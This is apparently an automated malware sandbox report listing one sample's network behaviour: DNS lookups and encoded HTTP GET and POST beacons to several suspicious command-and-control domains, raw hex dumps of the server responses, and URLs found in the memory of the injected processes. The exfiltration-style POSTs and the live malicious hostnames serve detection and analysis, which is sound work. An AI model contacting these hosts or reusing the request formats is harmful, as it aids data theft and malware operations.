                Source: global trafficHTTP traffic detected: GET /d9ku/?6vSXrZxp=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94atf+kZPaCRs8iMXYlGBxwothes9BXg==&av=Zj6TS2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.amayavp.xyzConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /vg0z/?6vSXrZxp=75uk3ictCfC5d95jc9ErhxuZnXjbt/7lQbKW3bXizAnaAV7ibEnK2RjZpZGGD2cxunkBvA8A/q4ys0sLjHkTW6XWjcMaa2pZqz34d1+1Sa3fEZ+ULw==&av=Zj6TS2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.vayui.topConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /o362/?6vSXrZxp=FaNItuPk5TcZ9HdRFxGis99OVV5mBzvNwqypTl8+VCtQ49ZNgIXGwO2PY0xc/TpBxHoMd3n/rLst/5dAk+rqTlrKzSCDFFwXYzga3uqvdEw6tCWfOw==&av=Zj6TS2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.rgenerousrs.storeConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /jhb8/?6vSXrZxp=0R31+Vq/Nm8msngZkniPPNslS216pvARFjw5y1poIV3xx1K38BT3Oq7zCSGYp4hHlG+YTfvzleF+eXVetOmvkZEk/wC7YtB6KW2U/08aXnOShntluQ==&av=Zj6TS2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.t91rl7.proConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficDNS traffic detected: DNS query: www.nb-shenshi.buzz
                Source: global trafficDNS traffic detected: DNS query: www.laohub10.net
                Source: global trafficDNS traffic detected: DNS query: www.xcvbj.asia
                Source: global trafficDNS traffic detected: DNS query: www.soainsaat.xyz
                Source: global trafficDNS traffic detected: DNS query: www.amayavp.xyz
                Source: global trafficDNS traffic detected: DNS query: www.vayui.top
                Source: global trafficDNS traffic detected: DNS query: www.rgenerousrs.store
                Source: global trafficDNS traffic detected: DNS query: www.t91rl7.pro
                Source: unknownHTTP traffic detected: POST /sgdd/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-USHost: www.laohub10.netOrigin: http://www.laohub10.netReferer: http://www.laohub10.net/sgdd/Cache-Control: no-cacheContent-Length: 197Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 MobileData Raw: 36 76 53 58 72 5a 78 70 3d 71 33 44 38 31 64 48 54 67 48 57 32 6a 59 73 72 6b 77 50 4a 52 64 37 46 6c 50 47 57 48 6e 59 4c 39 47 34 63 70 6d 52 67 66 50 38 6f 4f 32 44 6e 4f 65 5a 41 49 76 79 58 48 2b 62 71 35 46 30 39 4f 72 32 55 78 73 7a 59 59 46 4c 2b 6d 59 51 42 56 62 2b 34 42 68 2f 42 45 78 64 77 73 34 39 68 70 55 33 41 44 31 4a 2b 41 32 56 4b 41 33 39 76 53 76 2b 44 64 2b 67 6a 59 37 72 31 4a 64 71 32 4d 6e 5a 56 4a 69 59 77 69 4f 36 65 39 69 46 77 39 50 64 70 78 6b 76 61 69 2b 6f 73 4d 4f 77 4c 66 35 37 46 62 46 45 66 38 74 77 54 55 53 32 38 76 69 32 69 35 52 7a 32 74 61 6d 2f Data Ascii: 6vSXrZxp=q3D81dHTgHW2jYsrkwPJRd7FlPGWHnYL9G4cpmRgfP8oO2DnOeZAIvyXH+bq5F09Or2UxszYYFL+mYQBVb+4Bh/BExdws49hpU3AD1J+A2VKA39vSv+Dd+gjY7r1Jdq2MnZVJiYwiO6e9iFw9Pdpxkvai+osMOwLf57FbFEf8twTUS28vi2i5Rz2tam/
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:13:05 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cd104a-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sun, 24 Nov 2024 07:14:22 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-11-24T07:14:27.9027889Z
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:14:45 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B5689FjxHcuVXmWA34FOicsfxEV8J%2BwCFuKpVrosObE%2F4Bwko2nmqHZMwMtumXdnJ8tDsqa%2B4ctnh0pRLnyszIxxGVaPcHODdEJrs%2FY14pVlsl5pQnKyUs%2BOAB22vKsD"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e779a971eed42ee-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1592&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=735&delivery_rate=0&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:14:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G7bFXhafSdat23BO4kabOB%2BYgPSQPnB39wCQnVpHhgysx0pM8gUkAfZz3aD2Du%2F5jU2bfQqJgEW1iCKWle35SgrBwbsNsXzdCHy642LpyG%2FfFziYuFuUa03V8TssY3bX"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e779aa7bf1141cd-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1536&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=759&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 36 33 0d 0a b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f63(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:14:50 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xJBwL%2FE7MdPJiZj5Fzv6WHu%2FlKg42kBQnPg%2B%2FBxVwscGd7LQSCu1R6giAiOozMr0Jg31KCASO0eKk0fpSsMgPOrbS9APGWVVL%2Bu9VITSzMrkV8EsU%2BNeuKPMBPXzoDrq"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e779ab868d04399-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1714&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1772&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:14:53 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6fbdKsZDdU%2BNFDbk%2B86iERBeQFZ2q6uNUvPLGYvNb2mbMONwB5cTZW%2FbFuZM%2FGvUDmMgTUqiulVX5XCCxP8fdfA%2BKSWqcNElgbxXii26coNW9xH%2FCYW%2BDNR0p%2Foo9K48"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e779ac91e5a1a40-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1748&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=475&delivery_rate=0&cwnd=193&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:15:00 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Ivejsjobhv6doc0HZEBkbHe9qHMvgjrPwHFavykbpoguEAAWrQsGzDAHy3cx4DfN05Px0EXkgxt9hbzxRY2G%2FGEUcVK6TiXFt7mgr6pyDwkss8b6i578F2I2t7W2Zy5BGRw%2FlGJZ5A%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e779af3c8d45e62-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1731&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=759&delivery_rate=0&cwnd=148&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8*0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:15:02 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7XjiIe9cHNjlJXZjJNl6ZGWjlP7RSQaG758O2lPR1zKcOVpBegzdJUCikdwN353Wy9xMvSSGONY91vU4QNy46511Iuk9qMh91tpoZ%2FsvJr45C7Ba2MbKkIuZSnrGnoneKZZkZ9WZ220%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e779b045f398c65-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2049&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=783&delivery_rate=0&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a Data Ascii: e5LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8b*
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:15:05 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gXWTKEGLRqfcyBwiX4pCmTtofiGyZYeR27Mpug%2B2YB%2BxrqJ7D6o90by5dKrQQJ7bQDcRtRGr1jTXSBKZ8vDGDjFnXswCTWbrVJt32Nry6RFHmb861Srs521EEho%2BHPn51glcH6L7w9Y%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e779b14fafc431c-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1768&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1796&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e5LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8b*0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:15:08 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2%2B7F1CKoJ2kk17r2Yumv2grFmCCdZYgFwxcj47gDc1uD78MnX0bALnJu1GnBlhxQ56XC4qbL3TZmRPcN8q%2B01N0wuG5FhDwQLmBqHFq%2B3NQgfWok%2BAkf1qFwfjwVeGjBPWgoQCeR6uA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e779b25ee0841ff-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1725&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=483&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 31 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 67 65 6e 65 72 6f 75 73 72 73 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 118<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.rgenerousrs.store Port 80</address></body></html>10
                Source: svchost.exe, 00000002.00000003.1587669784.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1587772591.0000000003048000.00000004.00000020.00020000.00000000.sdmp, McqlvggSSSjC.exe, 00000004.00000002.3220941177.0000000000558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://server/get.asp
                Source: bitsadmin.exe, 00000005.00000002.3222692242.00000000043FC000.00000004.10000000.00040000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.3224439751.00000000060D0000.00000004.00000800.00020000.00000000.sdmp, McqlvggSSSjC.exe, 00000006.00000002.3222166926.0000000003E4C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.amayavp.xyz/d9ku/?6vSXrZxp=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2
                Source: McqlvggSSSjC.exe, 00000006.00000002.3223837018.00000000058E7000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.t91rl7.pro
                Source: McqlvggSSSjC.exe, 00000006.00000002.3223837018.00000000058E7000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.t91rl7.pro/jhb8/
                Source: bitsadmin.exe, 00000005.00000003.1812558902.0000000007BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: bitsadmin.exe, 00000005.00000002.3222692242.0000000003F46000.00000004.10000000.00040000.00000000.sdmp, McqlvggSSSjC.exe, 00000006.00000002.3222166926.0000000003996000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn-bj.trafficmanager.net/?h=
                Source: bitsadmin.exe, 00000005.00000003.1812558902.0000000007BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: bitsadmin.exe, 00000005.00000003.1812558902.0000000007BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: bitsadmin.exe, 00000005.00000003.1812558902.0000000007BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: bitsadmin.exe, 00000005.00000003.1812558902.0000000007BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
